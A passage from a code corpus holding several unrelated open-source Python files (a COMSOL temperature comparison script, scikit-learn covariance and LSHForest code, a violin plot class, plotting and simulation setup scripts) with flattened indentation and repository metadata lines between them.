Calculate and compare difference between 3-D surface and center temperature profiles.
"""
import numpy as np
import matplotlib.pyplot as py
# Data from Comsol 3-D Oak Particle Simulation
# -----------------------------------------------------------------------------
f200 = 'comsol/200tempsOak.txt'
t200, _, _, Tc200, _, _, Tsa200 = np.loadtxt(f200, skiprows=5, unpack=True)
diff200 = abs(Tsa200 - Tc200)
max200 = np.max(diff200)
f400 = 'comsol/400tempsOak.txt'
t400, _, _, Tc400, _, _, Tsa400 = np.loadtxt(f400, skiprows=5, unpack=True)
diff400 = abs(Tsa400 - Tc400)
max400 = np.max(diff400)
f700 = 'comsol/700tempsOak.txt'
t700, _, _, Tc700, _, _, Tsa700 = np.loadtxt(f700, skiprows=5, unpack=True)
diff700 = abs(Tsa700 - Tc700)
max700 = np.max(diff700)
f1400 = 'comsol/1400tempsOak.txt'
t1400, _, _, Tc1400, _, _, Tsa1400 = np.loadtxt(f1400, skiprows=5, unpack=True)
diff1400 = abs(Tsa1400 - Tc1400)
max1400 = np.max(diff1400)
f2800 = 'comsol/2800tempsOak.txt'
t2800, _, _, Tc2800, _, _, Tsa2800 = np.loadtxt(f2800, skiprows=5, unpack=True)
diff2800 = abs(Tsa2800 - Tc2800)
max2800 = np.max(diff2800)
f5400 = 'comsol/5400tempsOak.txt'
t5400, _, _, Tc5400, _, _, Tsa5400 = np.loadtxt(f5400, skiprows=5, unpack=True)
diff5400 = abs(Tsa5400 - Tc5400)
max5400 = np.max(diff5400)
f10000 = 'comsol/10000tempsOak.txt'
t10000, _, _, Tc10000, _, _, Tsa10000 = np.loadtxt(f10000, skiprows=5, unpack=True)
diff10000 = abs(Tsa10000 - Tc10000)
max10000 = np.max(diff10000)
f20000 = 'comsol/20000tempsOak.txt'
t20000, _, _, Tc20000, _, _, Tsa20000 = np.loadtxt(f20000, skiprows=5, unpack=True)
diff20000 = abs(Tsa20000 - Tc20000)
max20000 = np.max(diff20000)
# bar chart
maxDiff = [max200, max400, max700, max1400, max2800, max5400, max10000, max20000]
xlabels = ('200um', '400um', '700um', '1.4mm', '2.8mm', '5.4mm', '10mm', '20mm')
xloc = range(len(xlabels))
# Plot Results
# -----------------------------------------------------------------------------
py.ion()
py.close('all')
def despine():
ax = py.gca()
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
py.tick_params(axis='both', bottom='off', top='off', left='off', right='off')
py.figure(1)
py.plot(t20000, diff20000, lw=2, label='20 mm')
py.plot(t10000, diff10000, lw=2, label='10 mm')
py.plot(t5400, diff5400, lw=2, label='5.4 mm')
py.plot(t2800, diff2800, lw=2, label='2.8 mm')
py.plot(t1400, diff1400, lw=2, label='1.4 mm')
py.plot(t700, diff700, lw=2, label='700 um')
py.plot(t400, diff400, lw=2, label='400 um')
py.plot(t200, diff200, lw=2, label='200 um')
py.xlim(0, 40)
py.ylabel('Temperature Difference (K)')
py.xlabel('Time (s)')
py.legend(loc='best', numpoints=1, frameon=False)
py.grid()
despine()
py.figure(2)
py.bar(xloc, maxDiff, align='center')
py.xticks(xloc, xlabels)
py.ylabel('Max Temperature Difference (K)')
py.xlabel('Feret Diameter')
py.grid()
despine()
| mit |
RPGOne/scikit-learn | examples/covariance/plot_lw_vs_oas.py | 159 | 2951 | """
=============================
Ledoit-Wolf vs OAS estimation
=============================
The usual covariance maximum likelihood estimate can be regularized
using shrinkage. Ledoit and Wolf proposed a close formula to compute
the asymptotically optimal shrinkage parameter (minimizing a MSE
criterion), yielding the Ledoit-Wolf covariance estimate.
Chen et al. proposed an improvement of the Ledoit-Wolf shrinkage
parameter, the OAS coefficient, whose convergence is significantly
better under the assumption that the data are Gaussian.
This example, inspired from Chen's publication [1], shows a comparison
of the estimated MSE of the LW and OAS methods, using Gaussian
distributed data.
[1] "Shrinkage Algorithms for MMSE Covariance Estimation"
Chen et al., IEEE Trans. on Sign. Proc., Volume 58, Issue 10, October 2010.
"""
print(__doc__)
import numpy as np
import matplotlib.pyplot as plt
from scipy.linalg import toeplitz, cholesky
from sklearn.covariance import LedoitWolf, OAS
np.random.seed(0)
###############################################################################
n_features = 100
# simulation covariance matrix (AR(1) process)
r = 0.1
real_cov = toeplitz(r ** np.arange(n_features))
coloring_matrix = cholesky(real_cov)
n_samples_range = np.arange(6, 31, 1)
repeat = 100
lw_mse = np.zeros((n_samples_range.size, repeat))
oa_mse = np.zeros((n_samples_range.size, repeat))
lw_shrinkage = np.zeros((n_samples_range.size, repeat))
oa_shrinkage = np.zeros((n_samples_range.size, repeat))
for i, n_samples in enumerate(n_samples_range):
for j in range(repeat):
X = np.dot(
np.random.normal(size=(n_samples, n_features)), coloring_matrix.T)
lw = LedoitWolf(store_precision=False, assume_centered=True)
lw.fit(X)
lw_mse[i, j] = lw.error_norm(real_cov, scaling=False)
lw_shrinkage[i, j] = lw.shrinkage_
oa = OAS(store_precision=False, assume_centered=True)
oa.fit(X)
oa_mse[i, j] = oa.error_norm(real_cov, scaling=False)
oa_shrinkage[i, j] = oa.shrinkage_
# plot MSE
plt.subplot(2, 1, 1)
plt.errorbar(n_samples_range, lw_mse.mean(1), yerr=lw_mse.std(1),
label='Ledoit-Wolf', color='navy', lw=2)
plt.errorbar(n_samples_range, oa_mse.mean(1), yerr=oa_mse.std(1),
label='OAS', color='darkorange', lw=2)
plt.ylabel("Squared error")
plt.legend(loc="upper right")
plt.title("Comparison of covariance estimators")
plt.xlim(5, 31)
# plot shrinkage coefficient
plt.subplot(2, 1, 2)
plt.errorbar(n_samples_range, lw_shrinkage.mean(1), yerr=lw_shrinkage.std(1),
label='Ledoit-Wolf', color='navy', lw=2)
plt.errorbar(n_samples_range, oa_shrinkage.mean(1), yerr=oa_shrinkage.std(1),
label='OAS', color='darkorange', lw=2)
plt.xlabel("n_samples")
plt.ylabel("Shrinkage")
plt.legend(loc="lower right")
plt.ylim(plt.ylim()[0], 1. + (plt.ylim()[1] - plt.ylim()[0]) / 10.)
plt.xlim(5, 31)
plt.show()
| bsd-3-clause |
pygeo/pycmbs | pycmbs/plots/violin.py | 1 | 10656 | # -*- coding: utf-8 -*-
"""
This file is part of pyCMBS.
(c) 2012- Alexander Loew
For COPYING and LICENSE details, please refer to the LICENSE file
"""
import matplotlib.pyplot as plt
import numpy as np
class ViolinPlot(object):
"""
generate ViolinPlot
References
----------
inspired by
[1] http://pyinsci.blogspot.de/2009/09/violin-plot-with-matplotlib.html
[2] http://en.wikipedia.org/wiki/Violin_plot
[3] http://statsmodels.sourceforge.net/devel/generated/statsmodels.graphics.boxplots.violinplot.html
[4] http://nbviewer.ipython.org/github/EnricoGiampieri/dataplot/blob/master/statplot.ipynb
"""
def __init__(self, data, data2=None, labels=None, ax=None,
boxplot=True, figsize=(10, 6), sortlabels=False):
"""
Parameters
----------
data : ndarray/dict
data to be plotted. needs to be of geometry [ngroups, nsamp]
where ngroups is the the number of different groups to
be plotted and would correspond also to len(labels)
data2 : ndarray/dict
second dataset to be plotted
labels : list
labels to be used for xticks
ax : axis
when provided, then the plot is generated on the particular
axis
boxplot : bool
plot boxplot
figsize : tuple
figure size
sortlabels : bool
sort labels in ascending order
"""
self.data = data
self.data2 = data2
if labels is None:
self.labels = range(len(self.data))
else:
self.labels = labels
if sortlabels:
self.labels.sort()
if ax is None:
fig = plt.figure(figsize=figsize)
rect = [0.1, 0.2, 0.8, 0.7] # l,b,w,h
#~ self.ax = fig.add_subplot(1, 1, 1)
self.ax = fig.add_axes(rect)
else:
self.ax = ax
self.boxplot = boxplot
# check
self._check()
def _check(self):
"""
routine to check internal consistency
"""
if self.data is not None:
if self.data2 is None:
if len(self.labels) != len(self.data):
print len(self.labels)
print self.labels
print len(self.data)
raise ValueError('Invalid geometry of labels and data!')
#~ if self.data2 is not None:
#~ if len(self.data) != len(self.data2):
#~ raise ValueError('Data arrays need to have same geometry')
def plot(self, alpha=0.3, classic=False):
"""
plot ViolinPlot
Parameters
----------
alpha : float
alpha value for area fill
classic : bool
make classic violin plot
"""
if self.data is None:
raise ValueError('Data is None and can therefore not be plotted!')
if classic:
self._plot_classic(alpha=alpha)
else:
self._plot_two_sided()
self._set_xticks()
def _plot_half_violin(self, data, pos, left=False, **kwargs):
"""
plot half violin
inspired by [4]
Parameters
----------
data : ndarray
array with data (only valid data, no masked array)
pos : ndarray
position
left : bool
specifies if the plot should be on the left side
"""
from scipy.stats import gaussian_kde
if len(data) < 2:
return None
amplitude = kwargs.pop('amplitude', 0.33)
x = np.linspace(min(data), max(data), 101)
v = gaussian_kde(data).evaluate(x)
v = v / v.max() * amplitude * (1 if left else -1)
kwargs.setdefault('facecolor', 'r')
kwargs.setdefault('alpha', 0.33)
return self.ax.fill_betweenx(x, pos, pos + v, **kwargs)
def _plot_two_sided(self, color1='b', color2='b'):
"""
violin plot with two sides
inspired by [4]
Parameters
----------
color1 : str
color for left plot
color2 : str
color for right plot
"""
data2 = self.data2 if self.data2 is not None else self.data
if self.labels is not None:
labels = self.labels
positions = range(len(labels))
else:
positions = self._get_positions()
labels = positions
self.labels = labels
for pos, key in zip(positions, labels):
#~ print type(self.data)
#~ print type(data2)
#~ print data2.keys()
if isinstance(self.data, dict):
if key in self.data.keys():
d1 = self.data[key]
else:
d1 = None
else:
d1 = self.data[pos]
if isinstance(data2, dict):
# in case that data is a dict
if key in data2.keys():
d2 = data2[key]
else:
d2 = None
else:
d2 = data2[pos]
if self.data is not data2:
color2 = 'r'
# generate plot
if d1 is not None:
self._plot_half_violin(d1, pos, left=False, facecolor=color1)
if d2 is not None:
self._plot_half_violin(d2, pos, left=True, facecolor=color2)
# division line between the two half
if (d1 is not None) and (d2 is not None):
if len(d1) > 0 & len(d2) > 0:
self.ax.plot([pos] * 2, [min(min(d1), min(d2)),
max(max(d1), max(d2))], '-', color='grey')
def _set_xticks(self, rotation=30.):
"""
set ticklabels
"""
self.ax.set_xticks(range(len(self.labels)))
self.ax.set_xticklabels(self.labels, rotation=rotation)
def _get_positions(self):
"""
get positions of xticks
"""
return range(len(self.data))
def _plot_classic(self, alpha):
"""
create classical violin plots on an axis
http://pyinsci.blogspot.de/2009/09/violin-plot-with-matplotlib.html
Parameters
----------
alpha : float
alpha value for area fill
"""
from scipy.stats import gaussian_kde
pos = self._get_positions()
dist = max(pos) - min(pos)
w = min(0.15 * max(dist, 1.0), 0.5)
for d, p in zip(self.data, pos):
if not np.all(d == 0.): # avoid singular matrices
k = gaussian_kde(d) # calculates the kernel density
m = k.dataset.min() # lower bound of violin
M = k.dataset.max() # upper bound of violin
x = np.arange(m, M, (M - m) / 100.) # support for violin
v = k.evaluate(x) # violin profile (density curve)
v = v / v.max() * w # scaling the violin to the available space
self.ax.fill_betweenx(x, p, v + p, facecolor='y', alpha=alpha)
self.ax.fill_betweenx(x, p, -v + p, facecolor='y', alpha=alpha)
if self.boxplot:
self.ax.boxplot(self.data, notch=1, positions=pos,
vert=True, sym='')
class ViolinPlotBins(ViolinPlot):
"""
Violinplot for binned data. Instead of plotting a Violin plot for
each group of data, this class allows to plot binned data
"""
def __init__(self, data, data2=None, bins=None, **kwargs):
"""
Parameters
----------
data : ndarray/dict
data to be plotted. Can be of any geometry. Data is however
flattened and then rearranged according to the bins.
data2 : ndarray/dict
second dataset to be plotted
bins : ndarray
[obligatory]
bins for the data. the bins correspond to the lower boundary
of the bin interval. Thus e.g.
[-1., 2., 5.] corresponds to intervals defined as
-1 <= x < 2
2 <= x < 5
x > 5 TODO perhaps also with an upper limit to be provided by user?
"""
self.bins = bins
self._check_bins()
if 'labels' in kwargs.keys():
raise ValueError('ERROR: labels can not be provided for this class!')
super(ViolinPlotBins, self).__init__(self._remap_data(data),
self._remap_data(data2), labels=self._remap_labels(),
**kwargs)
def _remap_labels(self):
"""
format label string
"""
return ['>=' + str(b) for b in self.bins]
def _remap_data(self, x, bins=None):
"""
Remap and bin data.
Flattens the data and then stores
Parameters
----------
x : ndarray
data array (will be flattened)
bins : ndarray
see documentation of class
Returns
-------
data : list
of structure [nbins, data_per_bin]
"""
self._check_bins()
x = x.flatten()
print x.min(), x.max()
data = [] # TODO this is slow how to do better?
for i in xrange(len(self.bins) - 1):
lb = self.bins[i]
ub = self.bins[i + 1]
data.append(x[(x >= lb) & (x < ub)])
data.append(x[(x >= ub)])
return data
def _check_bins(self):
if self.bins is None:
raise ValueError('ERROR: bins need to be provided!')
if np.any(np.diff(self.bins) <= 0.):
raise ValueError('ERROR: bins are not in ascending order!')
def _classic_example():
"""
some example how to do violin plotting
"""
plt.close('all')
pos = range(5)
data = [np.random.normal(size=100) for i in pos]
V = ViolinPlot(data)
V.plot(classic=True)
data = [np.random.normal(size=100) for i in pos]
V1 = ViolinPlot(data, labels=['A', 'B', 'C', 'D', 'E'])
V1.plot()
data = [np.random.normal(size=100) for i in pos]
data2 = [np.random.normal(size=100) for i in pos]
V2 = ViolinPlot(data, data2=data2, labels=['A', 'B', 'C', 'D', 'E'])
V2.plot()
# example with binned data
data = np.random.random((10, 20, 30)) * 6. - 3.
data2 = np.random.random((40, 50, 60)) * 6. - 3.
VB = ViolinPlotBins(data, data2=data2, bins=np.linspace(-3., 3., 11))
VB.plot()
plt.show()
if __name__ == '__main__':
_classic_example()
| mit |
freedomflyer/test | lab1/plotting.py | 1 | 2686 | import optparse
import sys
import matplotlib
matplotlib.use('Agg')
from pylab import *
import matplotlib.patches as mpatches
# Class that parses a file and plots several graphs
class Plotter:
def __init__(self):
# create some fake data
self.x = []
self.y = []
self.all = []
# x ranges from 0 to 9
for i in range(0,10):
self.x.append(i)
vals = []
# each x value has 100 random values of X + random(0,10)
for j in range(0,100):
val = i + 10*random()
vals.append(val)
# keep track of all values ever generated
self.all.append(val)
self.y.append(vals)
# keep track of the averages for each X
self.averages = []
for array in self.y:
self.averages.append(average(array))
def equationPlot(self):
""" Create a line graph of an equation. """
clf()
x = np.arange(0,9.9,0.1)
plot(x,1/(10-x))
xlabel('X')
ylabel('1/(10-x)')
savefig('equation.png')
def linePlot(self):
""" Create a line graph. """
clf()
plot(self.x,self.averages)
xlabel('X Label (units)')
ylabel('Y Label (units)')
savefig('line.png')
def linePlotData(self,xdata, ydata, xname, yname):
""" Create a line graph. """
clf()
#theoretical
rho = np.arange(0,1,1.0/100)
mu = 1000000.0 / (1000.0 * 8.0)
plot(rho,(1/(2*mu))*(rho/(1-rho)),label='Theory',color="green")
#actual
plot(xdata, ydata,label="Average",color="blue")
legend(loc='upper left')
#theoretical
xlabel(xname)
ylabel(yname)
savefig('throughput.png')
def boxPlot(self):
""" Create a box plot. """
clf()
boxplot(self.y,positions=self.x,widths=0.5)
xlabel('X Label (units)')
ylabel('Y Label (units)')
savefig('boxplot.png')
def combinedPlot(self):
""" Create a graph that includes a line plot and a boxplot. """
clf()
# plot the line
plot(self.x,self.averages)
# plot the boxplot
boxplot(self.y,positions=self.x,widths=0.5)
xlabel('X Label (units)')
ylabel('Y Label (units)')
savefig('combined.png')
def histogramPlot(self):
""" Create a histogram. """
clf()
hist(self.all,bins=range(0,20),rwidth=0.8)
savefig('histogram.png')
if __name__ == '__main__':
p = Plotter()
p.equationPlot()
p.linePlot()
p.boxPlot()
p.combinedPlot()
p.histogramPlot() | gpl-2.0 |
zingale/pyro2 | compressible/problems/logo.py | 2 | 2297 | from __future__ import print_function
import sys
import mesh.patch as patch
import numpy as np
from util import msg
import matplotlib.pyplot as plt
def init_data(my_data, rp):
""" initialize the logo problem """
msg.bold("initializing the logo problem...")
# make sure that we are passed a valid patch object
if not isinstance(my_data, patch.CellCenterData2d):
print("ERROR: patch invalid in logo.py")
print(my_data.__class__)
sys.exit()
# create the logo
myg = my_data.grid
fig = plt.figure(2, (0.64, 0.64), dpi=100*myg.nx/64)
fig.add_subplot(111)
fig.text(0.5, 0.5, "pyro", transform=fig.transFigure, fontsize="16",
horizontalalignment="center", verticalalignment="center")
plt.axis("off")
fig.canvas.draw()
data = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8, sep='')
data = data.reshape(fig.canvas.get_width_height()[::-1] + (3,))
logo = np.rot90(np.rot90(np.rot90((256-data[:, :, 1])/255.0)))
# get the density, momenta, and energy as separate variables
dens = my_data.get_var("density")
xmom = my_data.get_var("x-momentum")
ymom = my_data.get_var("y-momentum")
ener = my_data.get_var("energy")
myg = my_data.grid
# initialize the components, remember, that ener here is rho*eint
# + 0.5*rho*v**2, where eint is the specific internal energy
# (erg/g)
dens[:, :] = 1.0
xmom[:, :] = 0.0
ymom[:, :] = 0.0
# set the density in the logo zones to be really large
logo_dens = 50.0
dens.v()[:, :] = logo[:, :] * logo_dens
# pressure equilibrium
gamma = rp.get_param("eos.gamma")
p_ambient = 1.e-5
ener[:, :] = p_ambient/(gamma - 1.0)
# explosion
ener[myg.ilo, myg.jlo] = 1.0
ener[myg.ilo, myg.jhi] = 1.0
ener[myg.ihi, myg.jlo] = 1.0
ener[myg.ihi, myg.jhi] = 1.0
def finalize():
""" print out any information to the user at the end of the run """
msg = """
The script analysis/sedov_compare.py can be used to analyze these
results. That will perform an average at constant radius and
compare the radial profiles to the exact solution. Sample exact
data is provided as analysis/cylindrical-sedov.out
"""
print(msg)
| bsd-3-clause |
marcocaccin/scikit-learn | sklearn/neighbors/approximate.py | 30 | 22370 | """Approximate nearest neighbor search"""
# Author: Maheshakya Wijewardena <maheshakya.10@cse.mrt.ac.lk>
# Joel Nothman <joel.nothman@gmail.com>
import numpy as np
import warnings
from scipy import sparse
from .base import KNeighborsMixin, RadiusNeighborsMixin
from ..base import BaseEstimator
from ..utils.validation import check_array
from ..utils import check_random_state
from ..metrics.pairwise import pairwise_distances
from ..random_projection import GaussianRandomProjection
__all__ = ["LSHForest"]
HASH_DTYPE = '>u4'
MAX_HASH_SIZE = np.dtype(HASH_DTYPE).itemsize * 8
def _find_matching_indices(tree, bin_X, left_mask, right_mask):
"""Finds indices in sorted array of integers.
Most significant h bits in the binary representations of the
integers are matched with the items' most significant h bits.
"""
left_index = np.searchsorted(tree, bin_X & left_mask)
right_index = np.searchsorted(tree, bin_X | right_mask,
side='right')
return left_index, right_index
def _find_longest_prefix_match(tree, bin_X, hash_size,
left_masks, right_masks):
"""Find the longest prefix match in tree for each query in bin_X
Most significant bits are considered as the prefix.
"""
hi = np.empty_like(bin_X, dtype=np.intp)
hi.fill(hash_size)
lo = np.zeros_like(bin_X, dtype=np.intp)
res = np.empty_like(bin_X, dtype=np.intp)
left_idx, right_idx = _find_matching_indices(tree, bin_X,
left_masks[hi],
right_masks[hi])
found = right_idx > left_idx
res[found] = lo[found] = hash_size
r = np.arange(bin_X.shape[0])
kept = r[lo < hi] # indices remaining in bin_X mask
while kept.shape[0]:
mid = (lo.take(kept) + hi.take(kept)) // 2
left_idx, right_idx = _find_matching_indices(tree,
bin_X.take(kept),
left_masks[mid],
right_masks[mid])
found = right_idx > left_idx
mid_found = mid[found]
lo[kept[found]] = mid_found + 1
res[kept[found]] = mid_found
hi[kept[~found]] = mid[~found]
kept = r[lo < hi]
return res
class ProjectionToHashMixin(object):
"""Turn a transformed real-valued array into a hash"""
@staticmethod
def _to_hash(projected):
if projected.shape[1] % 8 != 0:
raise ValueError('Require reduced dimensionality to be a multiple '
'of 8 for hashing')
# XXX: perhaps non-copying operation better
out = np.packbits((projected > 0).astype(int)).view(dtype=HASH_DTYPE)
return out.reshape(projected.shape[0], -1)
def fit_transform(self, X, y=None):
self.fit(X)
return self.transform(X)
def transform(self, X, y=None):
return self._to_hash(super(ProjectionToHashMixin, self).transform(X))
class GaussianRandomProjectionHash(ProjectionToHashMixin,
GaussianRandomProjection):
"""Use GaussianRandomProjection to produce a cosine LSH fingerprint"""
def __init__(self,
n_components=8,
random_state=None):
super(GaussianRandomProjectionHash, self).__init__(
n_components=n_components,
random_state=random_state)
def _array_of_arrays(list_of_arrays):
"""Creates an array of array from list of arrays."""
out = np.empty(len(list_of_arrays), dtype=object)
out[:] = list_of_arrays
return out
class LSHForest(BaseEstimator, KNeighborsMixin, RadiusNeighborsMixin):
"""Performs approximate nearest neighbor search using LSH forest.
LSH Forest: Locality Sensitive Hashing forest [1] is an alternative
method for vanilla approximate nearest neighbor search methods.
LSH forest data structure has been implemented using sorted
arrays and binary search and 32 bit fixed-length hashes.
Random projection is used as the hash family which approximates
cosine distance.
The cosine distance is defined as ``1 - cosine_similarity``: the lowest
value is 0 (identical point) but it is bounded above by 2 for the farthest
points. Its value does not depend on the norm of the vector points but
only on their relative angles.
Read more in the :ref:`User Guide <approximate_nearest_neighbors>`.
Parameters
----------
n_estimators : int (default = 10)
Number of trees in the LSH Forest.
min_hash_match : int (default = 4)
lowest hash length to be searched when candidate selection is
performed for nearest neighbors.
n_candidates : int (default = 10)
Minimum number of candidates evaluated per estimator, assuming enough
items meet the `min_hash_match` constraint.
n_neighbors : int (default = 5)
Number of neighbors to be returned from query function when
it is not provided to the :meth:`kneighbors` method.
radius : float, optinal (default = 1.0)
Radius from the data point to its neighbors. This is the parameter
space to use by default for the :meth`radius_neighbors` queries.
radius_cutoff_ratio : float, optional (default = 0.9)
A value ranges from 0 to 1. Radius neighbors will be searched until
the ratio between total neighbors within the radius and the total
candidates becomes less than this value unless it is terminated by
hash length reaching `min_hash_match`.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
Attributes
----------
hash_functions_ : list of GaussianRandomProjectionHash objects
Hash function g(p,x) for a tree is an array of 32 randomly generated
float arrays with the same dimenstion as the data set. This array is
stored in GaussianRandomProjectionHash object and can be obtained
from ``components_`` attribute.
trees_ : array, shape (n_estimators, n_samples)
Each tree (corresponding to a hash function) contains an array of
sorted hashed values. The array representation may change in future
versions.
original_indices_ : array, shape (n_estimators, n_samples)
Original indices of sorted hashed values in the fitted index.
References
----------
.. [1] M. Bawa, T. Condie and P. Ganesan, "LSH Forest: Self-Tuning
Indexes for Similarity Search", WWW '05 Proceedings of the
14th international conference on World Wide Web, 651-660,
2005.
Examples
--------
>>> from sklearn.neighbors import LSHForest
>>> X_train = [[5, 5, 2], [21, 5, 5], [1, 1, 1], [8, 9, 1], [6, 10, 2]]
>>> X_test = [[9, 1, 6], [3, 1, 10], [7, 10, 3]]
>>> lshf = LSHForest(random_state=42)
>>> lshf.fit(X_train) # doctest: +NORMALIZE_WHITESPACE
LSHForest(min_hash_match=4, n_candidates=50, n_estimators=10,
n_neighbors=5, radius=1.0, radius_cutoff_ratio=0.9,
random_state=42)
>>> distances, indices = lshf.kneighbors(X_test, n_neighbors=2)
>>> distances # doctest: +ELLIPSIS
array([[ 0.069..., 0.149...],
[ 0.229..., 0.481...],
[ 0.004..., 0.014...]])
>>> indices
array([[1, 2],
[2, 0],
[4, 0]])
"""
def __init__(self, n_estimators=10, radius=1.0, n_candidates=50,
n_neighbors=5, min_hash_match=4, radius_cutoff_ratio=.9,
random_state=None):
self.n_estimators = n_estimators
self.radius = radius
self.random_state = random_state
self.n_candidates = n_candidates
self.n_neighbors = n_neighbors
self.min_hash_match = min_hash_match
self.radius_cutoff_ratio = radius_cutoff_ratio
def _compute_distances(self, query, candidates):
"""Computes the cosine distance.
Distance is from the query to points in the candidates array.
Returns argsort of distances in the candidates
array and sorted distances.
"""
if candidates.shape == (0,):
# needed since _fit_X[np.array([])] doesn't work if _fit_X sparse
return np.empty(0, dtype=np.int), np.empty(0, dtype=float)
if sparse.issparse(self._fit_X):
candidate_X = self._fit_X[candidates]
else:
candidate_X = self._fit_X.take(candidates, axis=0, mode='clip')
distances = pairwise_distances(query, candidate_X,
metric='cosine')[0]
distance_positions = np.argsort(distances)
distances = distances.take(distance_positions, mode='clip', axis=0)
return distance_positions, distances
def _generate_masks(self):
"""Creates left and right masks for all hash lengths."""
tri_size = MAX_HASH_SIZE + 1
# Called once on fitting, output is independent of hashes
left_mask = np.tril(np.ones((tri_size, tri_size), dtype=int))[:, 1:]
right_mask = left_mask[::-1, ::-1]
self._left_mask = np.packbits(left_mask).view(dtype=HASH_DTYPE)
self._right_mask = np.packbits(right_mask).view(dtype=HASH_DTYPE)
def _get_candidates(self, query, max_depth, bin_queries, n_neighbors):
"""Performs the Synchronous ascending phase.
Returns an array of candidates, their distance ranks and
distances.
"""
index_size = self._fit_X.shape[0]
# Number of candidates considered including duplicates
# XXX: not sure whether this is being calculated correctly wrt
# duplicates from different iterations through a single tree
n_candidates = 0
candidate_set = set()
min_candidates = self.n_candidates * self.n_estimators
while (max_depth > self.min_hash_match and
(n_candidates < min_candidates or
len(candidate_set) < n_neighbors)):
left_mask = self._left_mask[max_depth]
right_mask = self._right_mask[max_depth]
for i in range(self.n_estimators):
start, stop = _find_matching_indices(self.trees_[i],
bin_queries[i],
left_mask, right_mask)
n_candidates += stop - start
candidate_set.update(
self.original_indices_[i][start:stop].tolist())
max_depth -= 1
candidates = np.fromiter(candidate_set, count=len(candidate_set),
dtype=np.intp)
# For insufficient candidates, candidates are filled.
# Candidates are filled from unselected indices uniformly.
if candidates.shape[0] < n_neighbors:
warnings.warn(
"Number of candidates is not sufficient to retrieve"
" %i neighbors with"
" min_hash_match = %i. Candidates are filled up"
" uniformly from unselected"
" indices." % (n_neighbors, self.min_hash_match))
remaining = np.setdiff1d(np.arange(0, index_size), candidates)
to_fill = n_neighbors - candidates.shape[0]
candidates = np.concatenate((candidates, remaining[:to_fill]))
ranks, distances = self._compute_distances(query,
candidates.astype(int))
return (candidates[ranks[:n_neighbors]],
distances[:n_neighbors])
def _get_radius_neighbors(self, query, max_depth, bin_queries, radius):
"""Finds radius neighbors from the candidates obtained.
Their distances from query are smaller than radius.
Returns radius neighbors and distances.
"""
ratio_within_radius = 1
threshold = 1 - self.radius_cutoff_ratio
total_candidates = np.array([], dtype=int)
total_neighbors = np.array([], dtype=int)
total_distances = np.array([], dtype=float)
while (max_depth > self.min_hash_match and
ratio_within_radius > threshold):
left_mask = self._left_mask[max_depth]
right_mask = self._right_mask[max_depth]
candidates = []
for i in range(self.n_estimators):
start, stop = _find_matching_indices(self.trees_[i],
bin_queries[i],
left_mask, right_mask)
candidates.extend(
self.original_indices_[i][start:stop].tolist())
candidates = np.setdiff1d(candidates, total_candidates)
total_candidates = np.append(total_candidates, candidates)
ranks, distances = self._compute_distances(query, candidates)
m = np.searchsorted(distances, radius, side='right')
positions = np.searchsorted(total_distances, distances[:m])
total_neighbors = np.insert(total_neighbors, positions,
candidates[ranks[:m]])
total_distances = np.insert(total_distances, positions,
distances[:m])
ratio_within_radius = (total_neighbors.shape[0] /
float(total_candidates.shape[0]))
max_depth = max_depth - 1
return total_neighbors, total_distances
def fit(self, X, y=None):
"""Fit the LSH forest on the data.
This creates binary hashes of input data points by getting the
dot product of input points and hash_function then
transforming the projection into a binary string array based
on the sign (positive/negative) of the projection.
A sorted array of binary hashes is created.
Parameters
----------
X : array_like or sparse (CSR) matrix, shape (n_samples, n_features)
List of n_features-dimensional data points. Each row
corresponds to a single data point.
Returns
-------
self : object
Returns self.
"""
self._fit_X = check_array(X, accept_sparse='csr')
# Creates a g(p,x) for each tree
self.hash_functions_ = []
self.trees_ = []
self.original_indices_ = []
rng = check_random_state(self.random_state)
int_max = np.iinfo(np.int32).max
for i in range(self.n_estimators):
# This is g(p,x) for a particular tree.
# Builds a single tree. Hashing is done on an array of data points.
# `GaussianRandomProjection` is used for hashing.
# `n_components=hash size and n_features=n_dim.
hasher = GaussianRandomProjectionHash(MAX_HASH_SIZE,
rng.randint(0, int_max))
hashes = hasher.fit_transform(self._fit_X)[:, 0]
original_index = np.argsort(hashes)
bin_hashes = hashes[original_index]
self.original_indices_.append(original_index)
self.trees_.append(bin_hashes)
self.hash_functions_.append(hasher)
self._generate_masks()
return self
def _query(self, X):
"""Performs descending phase to find maximum depth."""
# Calculate hashes of shape (n_samples, n_estimators, [hash_size])
bin_queries = np.asarray([hasher.transform(X)[:, 0]
for hasher in self.hash_functions_])
bin_queries = np.rollaxis(bin_queries, 1)
# descend phase
depths = [_find_longest_prefix_match(tree, tree_queries, MAX_HASH_SIZE,
self._left_mask, self._right_mask)
for tree, tree_queries in zip(self.trees_,
np.rollaxis(bin_queries, 1))]
return bin_queries, np.max(depths, axis=0)
def kneighbors(self, X, n_neighbors=None, return_distance=True):
"""Returns n_neighbors of approximate nearest neighbors.
Parameters
----------
X : array_like or sparse (CSR) matrix, shape (n_samples, n_features)
List of n_features-dimensional data points. Each row
corresponds to a single query.
n_neighbors : int, opitonal (default = None)
Number of neighbors required. If not provided, this will
return the number specified at the initialization.
return_distance : boolean, optional (default = False)
Returns the distances of neighbors if set to True.
Returns
-------
dist : array, shape (n_samples, n_neighbors)
Array representing the cosine distances to each point,
only present if return_distance=True.
ind : array, shape (n_samples, n_neighbors)
Indices of the approximate nearest points in the population
matrix.
"""
if not hasattr(self, 'hash_functions_'):
raise ValueError("estimator should be fitted.")
if n_neighbors is None:
n_neighbors = self.n_neighbors
X = check_array(X, accept_sparse='csr')
neighbors, distances = [], []
bin_queries, max_depth = self._query(X)
for i in range(X.shape[0]):
neighs, dists = self._get_candidates(X[[i]], max_depth[i],
bin_queries[i],
n_neighbors)
neighbors.append(neighs)
distances.append(dists)
if return_distance:
return np.array(distances), np.array(neighbors)
else:
return np.array(neighbors)
def radius_neighbors(self, X, radius=None, return_distance=True):
"""Finds the neighbors within a given radius of a point or points.
Return the indices and distances of some points from the dataset
lying in a ball with size ``radius`` around the points of the query
array. Points lying on the boundary are included in the results.
The result points are *not* necessarily sorted by distance to their
query point.
LSH Forest being an approximate method, some true neighbors from the
indexed dataset might be missing from the results.
Parameters
----------
X : array_like or sparse (CSR) matrix, shape (n_samples, n_features)
List of n_features-dimensional data points. Each row
corresponds to a single query.
radius : float
Limiting distance of neighbors to return.
